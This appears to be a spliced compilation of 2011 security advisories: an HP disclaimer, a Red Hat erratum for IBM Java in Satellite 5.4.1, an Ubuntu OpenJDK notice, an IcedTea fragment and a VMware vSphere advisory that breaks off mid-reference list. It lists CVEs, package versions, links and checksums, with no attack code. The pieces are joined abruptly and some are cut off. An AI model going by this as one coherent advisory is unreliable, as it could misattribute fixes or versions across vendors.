Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Summary:
Updated java-1.6.0-ibm packages that fix several security issues are now
available for Red Hat Network Satellite 5.4.1 for Red Hat
Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having low
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section. Relevant releases/architectures:
Red Hat Network Satellite Server 5.4 (RHEL v.5) - i386, s390x, x86_64
3. Description:
This update corrects several security vulnerabilities in the IBM Java
Runtime Environment shipped as part of Red Hat Network Satellite 5.4.1. In
a typical operating environment, these are of low security risk as the
runtime is not used on untrusted applets. Detailed vulnerability descriptions are linked from the IBM
"Security alerts" page, listed in the References section. (CVE-2009-3555,
CVE-2010-1321, CVE-2010-3541, CVE-2010-3548, CVE-2010-3549, CVE-2010-3550,
CVE-2010-3551, CVE-2010-3553, CVE-2010-3555, CVE-2010-3556, CVE-2010-3557,
CVE-2010-3558, CVE-2010-3560, CVE-2010-3562, CVE-2010-3563, CVE-2010-3565,
CVE-2010-3566, CVE-2010-3568, CVE-2010-3569, CVE-2010-3571, CVE-2010-3572,
CVE-2010-3573, CVE-2010-3574, CVE-2010-4422, CVE-2010-4447, CVE-2010-4448,
CVE-2010-4452, CVE-2010-4454, CVE-2010-4462, CVE-2010-4463, CVE-2010-4465,
CVE-2010-4466, CVE-2010-4467, CVE-2010-4468, CVE-2010-4471, CVE-2010-4473,
CVE-2010-4475, CVE-2010-4476)
Users of Red Hat Network Satellite 5.4.1 are advised to upgrade to these
updated java-1.6.0-ibm packages, which contain the IBM 1.6.0 SR9-FP1 Java
release. For this update to take effect, Red Hat Network Satellite must be
restarted. Refer to the Solution section for details. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
Run the following command to restart the Red Hat Network Satellite
server:
# rhn-satellite restart
5. Bugs fixed (http://bugzilla.redhat.com/):
533125 - CVE-2009-3555 TLS: MITM attacks via session renegotiation
582466 - CVE-2010-1321 krb5: null pointer dereference in GSS-API library leads to DoS (MITKRB5-SA-2010-005)
639876 - CVE-2010-3568 OpenJDK Deserialization Race condition (6559775)
639897 - CVE-2010-3562 OpenJDK IndexColorModel double-free (6925710)
639904 - CVE-2010-3557 OpenJDK Swing mutable static (6938813)
639909 - CVE-2010-3548 OpenJDK DNS server IP address information leak (6957564)
639920 - CVE-2010-3565 OpenJDK JPEG writeImage remote code execution (6963023)
639922 - CVE-2010-3566 OpenJDK ICC Profile remote code execution (6963489)
639925 - CVE-2010-3569 OpenJDK Serialization inconsistencies (6966692)
642167 - CVE-2010-3553 OpenJDK Swing unsafe reflection usage (6622002)
642180 - CVE-2010-3549 OpenJDK HttpURLConnection request splitting (6952017)
642187 - CVE-2010-3551 OpenJDK local network address disclosure (6952603)
642202 - CVE-2010-3541 CVE-2010-3573 OpenJDK HttpURLConnection allows arbitrary request headers (6961084,6980004)
642215 - CVE-2010-3574 OpenJDK HttpURLConnection incomplete TRACE permission check (6981426)
642558 - CVE-2010-3555 JDK unspecified vulnerability in Deployment component
642559 - CVE-2010-3550 JDK unspecified vulnerability in Java Web Start component
642573 - CVE-2010-3560 JDK unspecified vulnerability in Networking component
642576 - CVE-2010-3556 JDK unspecified vulnerability in 2D component
642585 - CVE-2010-3571 JDK unspecified vulnerability in 2D component
642589 - CVE-2010-3563 JDK unspecified vulnerability in Deployment component
642593 - CVE-2010-3558 JDK unspecified vulnerability in Java Web Start component
642611 - CVE-2010-3572 JDK unspecified vulnerability in Sound component
674336 - CVE-2010-4476 JDK Double.parseDouble Denial-Of-Service
675984 - CVE-2010-4465 OpenJDK Swing timer-based security manager bypass (6907662)
676019 - CVE-2010-4471 OpenJDK Java2D font-related system property leak (6985453)
676023 - CVE-2010-4448 OpenJDK DNS cache poisoning by untrusted applets (6981922)
677957 - CVE-2010-4475 JDK unspecified vulnerability in Deployment component
677958 - CVE-2010-4473 JDK unspecified vulnerability in Sound component
677959 - CVE-2010-4468 JDK unspecified vulnerability in JDBC component
677960 - CVE-2010-4467 JDK unspecified vulnerability in Deployment component
677961 - CVE-2010-4466 JDK unspecified vulnerability in Deployment component
677963 - CVE-2010-4463 JDK unspecified vulnerability in Deployment component
677966 - CVE-2010-4462 JDK unspecified vulnerability in Sound component
677967 - CVE-2010-4454 JDK unspecified vulnerability in Sound component
677968 - CVE-2010-4452 JDK unspecified vulnerability in Deployment component
677970 - CVE-2010-4447 JDK unspecified vulnerability in Deployment component
677971 - CVE-2010-4422 JDK unspecified vulnerability in Deployment component
6. Package List:
Red Hat Network Satellite Server 5.4 (RHEL v.5):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.src.rpm
i386:
java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.i386.rpm
java-1.6.0-ibm-devel-1.6.0.9.1-1jpp.1.el5.i386.rpm
s390x:
java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.s390x.rpm
java-1.6.0-ibm-devel-1.6.0.9.1-1jpp.1.el5.s390x.rpm
x86_64:
java-1.6.0-ibm-1.6.0.9.1-1jpp.1.el5.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.9.1-1jpp.1.el5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc. ===========================================================
Ubuntu Security Notice USN-1079-2 March 15, 2011
openjdk-6b18 vulnerabilities
CVE-2010-4448, CVE-2010-4450, CVE-2010-4465, CVE-2010-4469,
CVE-2010-4470, CVE-2010-4471, CVE-2010-4472, CVE-2010-4476,
CVE-2011-0706
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 9.10
Ubuntu 10.04 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 9.10:
icedtea6-plugin 6b18-1.8.7-0ubuntu1~9.10.1
openjdk-6-jre 6b18-1.8.7-0ubuntu1~9.10.1
openjdk-6-jre-headless 6b18-1.8.7-0ubuntu1~9.10.1
Ubuntu 10.04 LTS:
icedtea6-plugin 6b18-1.8.7-0ubuntu1~10.04.2
openjdk-6-jre 6b18-1.8.7-0ubuntu1~10.04.2
openjdk-6-jre-headless 6b18-1.8.7-0ubuntu1~10.04.2
After a standard system update you need to restart any Java services,
applications or applets to make all the necessary changes.
Details follow:
USN-1079-1 fixed vulnerabilities in OpenJDK 6 for non-armel (ARM)
architectures. This update provides the corresponding updates for
OpenJDK 6 for use with the armel (ARM) architectures.
In order to build the armel (ARM) OpenJDK 6 update for Ubuntu 10.04
LTS, it was necessary to rebuild binutils and gcj-4.4 from Ubuntu
10.04 LTS updates.
Original advisory details:
It was discovered that untrusted Java applets could create domain
name resolution cache entries, allowing an attacker to manipulate
name resolution within the JVM. (CVE-2010-4448)
It was discovered that the Java launcher did not did not properly
setup the LD_LIBRARY_PATH environment variable. A local attacker
could exploit this to execute arbitrary code as the user invoking
the program. (CVE-2010-4450)
It was discovered that within the Swing library, forged timer events
could allow bypass of SecurityManager checks. This could allow an
attacker to access restricted resources. (CVE-2010-4465)
It was discovered that certain bytecode combinations confused memory
management within the HotSpot JVM. (CVE-2010-4469)
It was discovered that the way JAXP components were handled
allowed them to be manipulated by untrusted applets. An attacker
could use this to bypass XML processing restrictions and elevate
privileges. (CVE-2010-4470)
It was discovered that the Java2D subcomponent, when processing broken
CFF fonts could leak system properties. (CVE-2010-4471)
It was discovered that a flaw in the XML Digital Signature
component could allow an attacker to cause untrusted code to
replace the XML Digital Signature Transform or C14N algorithm
implementations. (CVE-2010-4472)
Konstantin Prei\xdfer and others discovered that specific double literals
were improperly handled, allowing a remote attacker to cause a denial
of service. (CVE-2011-0706)
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~9.10.1.diff.gz
Size/MD5: 146232 31c9fd1c87f901507dec909a87d40589
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~9.10.1.dsc
Size/MD5: 3009 13ad66a10ac1cb3698ec20d1d214a626
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7.orig.tar.gz
Size/MD5: 71430490 b2811b2e53cd9abaad6959d33fe10d19
armel architecture (ARM Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea-6-jre-cacao_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 369758 6c4489efb438728ec430f7fe9c560a24
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea6-plugin_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 75714 7d6bcfe18707892e7aebe836cff565db
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-dbg_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 84965722 3bd57de4c9b80d33e545cd1e9c9492e9
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-demo_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 1544602 d3689556c3354209f1ac402f2ebde500
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jdk_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 9107834 c31913d1c41bc826021784ea9c99cfb5
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre-headless_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 29720800 eff015c81953c6d7384706d14d97a896
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 255212 d01547c3c8ea7991c8417718e0d9031b
http://ports.ubuntu.com/pool/universe/o/openjdk-6b18/openjdk-6-jre-zero_6b18-1.8.7-0ubuntu1~9.10.1_armel.deb
Size/MD5: 4853678 3da0193b13769aff3f13c3946ac145a5
Updated packages for Ubuntu 10.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~10.04.2.diff.gz
Size/MD5: 146294 ed4b09749d16004b52b0488c8191eb3f
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7-0ubuntu1~10.04.2.dsc
Size/MD5: 3062 5edaf7e9dbd70b79868927f2debafc6c
http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6b18/openjdk-6b18_6b18-1.8.7.orig.tar.gz
Size/MD5: 71430490 b2811b2e53cd9abaad6959d33fe10d19
armel architecture (ARM Architecture):
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea-6-jre-cacao_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 346450 a68c38540eabb97715893feecb295fb0
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/icedtea6-plugin_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 73856 8afdfac50e3431dbc7330f8b84ecf37b
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-dbg_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 41237528 13b2864e53bea1395ec4ee19a724fc98
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-demo_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 1525192 cf0e7f1013fa1f88134d288246dfa078
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jdk_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 9101442 a22e6ec0af97c5b2a2dc2dc71650a863
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre-headless_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 29512754 7e8283f159bbbad2ea5939c78db8bd6a
http://ports.ubuntu.com/pool/main/o/openjdk-6b18/openjdk-6-jre_6b18-1.8.7-0ubuntu1~10.04.2_armel.deb
Size/MD5: 245384 1ea80079241fe9ce65c39f6768ab842b
.
Background
==========
IcedTea is a distribution of the Java OpenJDK source code built with
free build tools. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2011-0013
Synopsis: VMware third party component updates for VMware vCenter
Server, vCenter Update Manager, ESXi and ESX
Issue date: 2011-10-27
Updated on: 2011-10-27 (initial release of advisory)
CVE numbers: --- openssl ---
CVE-2008-7270 CVE-2010-4180
--- libuser ---
CVE-2011-0002
--- nss, nspr ---
CVE-2010-3170 CVE-2010-3173
--- Oracle (Sun) JRE 1.6.0 ---
CVE-2010-1321 CVE-2010-3541 CVE-2010-3548 CVE-2010-3549
CVE-2010-3550 CVE-2010-3551 CVE-2010-3552 CVE-2010-3553
CVE-2010-3554 CVE-2010-3555 CVE-2010-3556 CVE-2010-3557
CVE-2010-3558 CVE-2010-3559 CVE-2010-3560 CVE-2010-3561
CVE-2010-3562 CVE-2010-3563 CVE-2010-3565 CVE-2010-3566
CVE-2010-3567 CVE-2010-3568 CVE-2010-3569 CVE-2010-3570
CVE-2010-3571 CVE-2010-3572 CVE-2010-3573 CVE-2010-3574
CVE-2010-4422 CVE-2010-4447 CVE-2010-4448 CVE-2010-4450
CVE-2010-4451 CVE-2010-4452 CVE-2010-4454 CVE-2010-4462
CVE-2010-4463 CVE-2010-4465 CVE-2010-4466 CVE-2010-4467
CVE-2010-4468 CVE-2010-4469 CVE-2010-4470 CVE-2010-4471
CVE-2010-4472 CVE-2010-4473 CVE-2010-4474 CVE-2010-4475
CVE-2010-4476
--- Oracle (Sun) JRE 1.5.0 ---
CVE-2010-4447 CVE-2010-4448 CVE-2010-4450 CVE-2010-4454
CVE-2010-4462 CVE-2010-4465 CVE-2010-4466 CVE-2010-4468
CVE-2010-4469 CVE-2010-4473 CVE-2010-4475 CVE-2010-4476
CVE-2011-0862 CVE-2011-0873 CVE-2011-0815 CVE-2011-0864
CVE-2011-0802 CVE-2011-0814 CVE-2011-0871 CVE-2011-0867
CVE-2011-0865
--- SFCB ---
CVE-2010-2054
- ------------------------------------------------------------------------
1. Summary
Update 2 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere
Hypervisor (ESXi) 4.1 and ESX 4.1 addresses several security issues.
2. Relevant releases
vCenter Server 4.1 without Update 2
vCenter Update Manager 4.1 without Update 2
ESXi 4.1 without patch ESX410-201110201-SG.
ESX 4.1 without patches ESX410-201110201-SG,
ESX410-201110204-SG, ESX410-201110206-SG,ESX410-201110214-SG.
3. Problem Description
a. ESX third party update for Service Console openssl RPM
The Service Console openssl RPM is updated to
openssl-0.9.8e.12.el5_5.7 resolving two security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-7270 and CVE-2010-4180 to these
issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
========= ======== ======= =================
vCenter any Windows not affected
hosted* any any not affected
ESXi any any not affected
ESX 4.1 ESX ESX410-201110204-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
ESX 3.0.3 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
b. ESX third party update for Service Console libuser RPM
The Service Console libuser RPM is updated to version
0.54.7-2.1.el5_5.2 to resolve a security issue.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2011-0002 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
========= ======== ======= =================
vCenter any Windows not affected
hosted* any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201110206-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
ESX 3.0.3 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
c. ESX third party update for Service Console nss and nspr RPMs
The Service Console Network Security Services (NSS) and Netscape
Portable Runtime (NSPR) libraries are updated to nspr-4.8.6-1
and nss-3.12.8-4 resolving multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-3170 and CVE-2010-3173 to these
issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
========= ======== ======= =================
vCenter any Windows not affected
hosted* any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201110214-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
ESX 3.0.3 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
d. vCenter Server and ESX, Oracle (Sun) JRE update 1.6.0_24
Oracle (Sun) JRE is updated to version 1.6.0_24, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
JRE 1.6.0_24: CVE-2010-4422, CVE-2010-4447, CVE-2010-4448,
CVE-2010-4450, CVE-2010-4451, CVE-2010-4452, CVE-2010-4454,
CVE-2010-4462, CVE-2010-4463, CVE-2010-4465, CVE-2010-4466,
CVE-2010-4467, CVE-2010-4468, CVE-2010-4469, CVE-2010-4470,
CVE-2010-4471, CVE-2010-4472, CVE-2010-4473, CVE-2010-4474,
CVE-2010-4475 and CVE-2010-4476.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
JRE 1.6.0_22: CVE-2010-1321, CVE-2010-3541, CVE-2010-3548,
CVE-2010-3549, CVE-2010-3550, CVE-2010-3551, CVE-2010-3552,
CVE-2010-3553, CVE-2010-3554, CVE-2010-3555, CVE-2010-3556,
CVE-2010-3557, CVE-2010-3558, CVE-2010-3559, CVE-2010-3560,
CVE-2010-3561, CVE-2010-3562, CVE-2010-3563, CVE-2010-3565,
CVE-2010-3566, CVE-2010-3567, CVE-2010-3568, CVE-2010-3569,
CVE-2010-3570, CVE-2010-3571, CVE-2010-3572, CVE-2010-3573 and
CVE-2010-3574.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 5.0 Windows not affected
vCenter 4.1 Windows Update 2
vCenter 4.0 Windows not applicable **
VirtualCenter 2.5 Windows not applicable **
Update Manager 5.0 Windows not affected
Update Manager 4.1 Windows not applicable **
Update Manager 4.0 Windows not applicable **
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201110201-SG
ESX 4.0 ESX not applicable **
ESX 3.5 ESX not applicable **
ESX 3.0.3 ESX not applicable **
* hosted products are VMware Workstation, Player, ACE, Fusion.
** this product uses the Oracle (Sun) JRE 1.5.0 family
e. vCenter Update Manager Oracle (Sun) JRE update 1.5.0_30
Oracle (Sun) JRE is updated to version 1.5.0_30, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.5.0_30: CVE-2011-0862, CVE-2011-0873,
CVE-2011-0815, CVE-2011-0864, CVE-2011-0802, CVE-2011-0814,
CVE-2011-0871, CVE-2011-0867 and CVE-2011-0865.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.5.0_28: CVE-2010-4447, CVE-2010-4448,
CVE-2010-4450, CVE-2010-4454, CVE-2010-4462, CVE-2010-4465,
CVE-2010-4466, CVE-2010-4468, CVE-2010-4469, CVE-2010-4473,
CVE-2010-4475, CVE-2010-4476.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 5.0 Windows not applicable **
vCenter 4.1 Windows not applicable **
vCenter 4.0 Windows patch pending
VirtualCenter 2.5 Windows patch pending
Update Manager 5.0 Windows not applicable **
Update Manager 4.1 Windows Update 2
Update Manager 4.0 Windows patch pending
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX not applicable **
ESX 4.0 ESX patch pending
ESX 3.5 ESX patch pending
ESX 3.0.3 ESX affected, no patch planned
* hosted products are VMware Workstation, Player, ACE, Fusion.
** this product uses the Oracle (Sun) JRE 1.6.0 family
f. Integer overflow in VMware third party component sfcb
This release resolves an integer overflow issue present in the
third party library SFCB when the httpMaxContentLength has been
changed from its default value to 0 in in /etc/sfcb/sfcb.cfg.
The integer overflow could allow remote attackers to cause a
denial of service (heap memory corruption) or possibly execute
arbitrary code via a large integer in the Content-Length HTTP
header.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-2054 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
========= ======== ======= =================
vCenter any Windows not affected
hosted* any any not affected
ESXi 5.0 ESXi not affected
ESXi 4.1 ESXi ESXi410-201110201-SG
ESXi 4.0 ESXi not affected
ESXi 3.5 ESXi not affected
ESX 4.1 ESX ESX410-201110201-SG
ESX 4.0 ESX not affected
ESX 3.5 ESX not affected
ESX 3.0.3 ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
4. Solution
Please review the patch/release notes for your product and version
and verify the checksum of your downloaded file.
VMware vCenter Server 4.1
----------------------------------------------
vCenter Server 4.1 Update 2
The download for vCenter Server includes VMware Update Manager.
Download link:
http://downloads.vmware.com/d/info/datacenter_cloud_infrastructure/vmware_vsphere/4_1
Release Notes:
http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html
https://www.vmware.com/support/pubs/vum_pubs.html
File: VMware-VIMSetup-all-4.1.0-493063.iso
md5sum: d132326846a85bfc9ebbc53defeee6e1
sha1sum: 192c3e5d2a10bbe53c025cc7eedb3133a23e0541
File: VMware-VIMSetup-all-4.1.0-493063.zip
md5sum: 7fd7b09e501bd8fde52649b395491222
sha1sum: 46dd00e7c594ac672a5d7c3c27d15be2f5a5f1f1
File: VMware-viclient-all-4.1.0-491557.exe
md5sum: dafd31619ae66da65115ac3900697e3a
sha1sum: 98be4d349c9a655621c068d105593be4a8e542ef
VMware ESXi 4.1
---------------
VMware ESXi 4.1 Update 2
Download link:
http://downloads.vmware.com/d/info/datacenter_cloud_infrastructure/vmware_vsphere/4_1
Release Notes:
https://www.vmware.com/support/pubs/vs_pages/vsp_pubs_esxi41_i_vc41.html
File: VMware-VMvisor-Installer-4.1.0.update02-502767.x86_64.iso
md5sum: 0aa78790a336c5fc6ba3d9807c98bfea
sha1sum: 7eebd34ab5bdc81401ae20dcf59a8f8ae22086ce
File: upgrade-from-esxi4.0-to-4.1-update02-502767.zip
md5sum: 459d9142a885854ef0fa6edd8d6a5677
sha1sum: 75978b6f0fc3b0ccc63babe6a65cfde6ec420d33
File: upgrade-from-ESXi3.5-to-4.1_update02.502767.zip
md5sum: 3047fac78a4aaa05cf9528d62fad9d73
sha1sum: dc99b6ff352ace77d5513b4c6d8a2cb7e766a09f
File: VMware-tools-linux-8.3.12-493255.iso
md5sum: 63028f2bf605d26798ac24525a0e6208
sha1sum: 95ca96eec7817da9d6e0c326ac44d8b050328932
File: VMware-viclient-all-4.1.0-491557.exe
md5sum: dafd31619ae66da65115ac3900697e3a
sha1sum: 98be4d349c9a655621c068d105593be4a8e542ef
VMware ESXi 4.1 Update 2 contains ESXi410-201110201-SG.
VMware ESX 4.1
--------------
VMware ESX 4.1 Update 2
Download link:
http://downloads.vmware.com/d/info/datacenter_cloud_infrastructure/vmware_vsphere/4_1
Release Notes:
http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html
File: ESX-4.1.0-update02-502767.iso
md5sum: 9a2b524446cbd756f0f1c7d8d88077f8
sha1sum: 2824c0628c341357a180b3ab20eb2b7ef1bee61c
File: pre-upgrade-from-esx4.0-to-4.1-502767.zip
md5sum: 9060ad94d9d3bad7d4fa3e4af69a41cf
sha1sum: 9b96ba630377946c42a8ce96f0b5745c56ca46b4
File: upgrade-from-esx4.0-to-4.1-update02-502767.zip
md5sum: 4b60f36ee89db8cb7e1243aa02cdb549
sha1sum: 6b9168a1b01379dce7db9d79fd280509e16d013f
File: VMware-tools-linux-8.3.12-493255.iso
md5sum: 63028f2bf605d26798ac24525a0e6208
sha1sum: 95ca96eec7817da9d6e0c326ac44d8b050328932
File: VMware-viclient-all-4.1.0-491557.exe
md5sum: dafd31619ae66da65115ac3900697e3a
sha1sum: 98be4d349c9a655621c068d105593be4a8e542ef
VMware ESX 4.1 Update 2 contains ESX410-201110204-SG,
ESX410-201110206-SG, ESX410-201110201-SG and
ESX410-201110214-SG.
5. References
CVE numbers
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2054
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3170
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3173
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3552
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3555
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3560
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3563
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4180
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4422
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4447
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4447
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4448
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4448
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4451
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4452
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4454
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4454
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4462
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4462
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4463
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4465
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4465
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4466
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4466
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4467
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4468
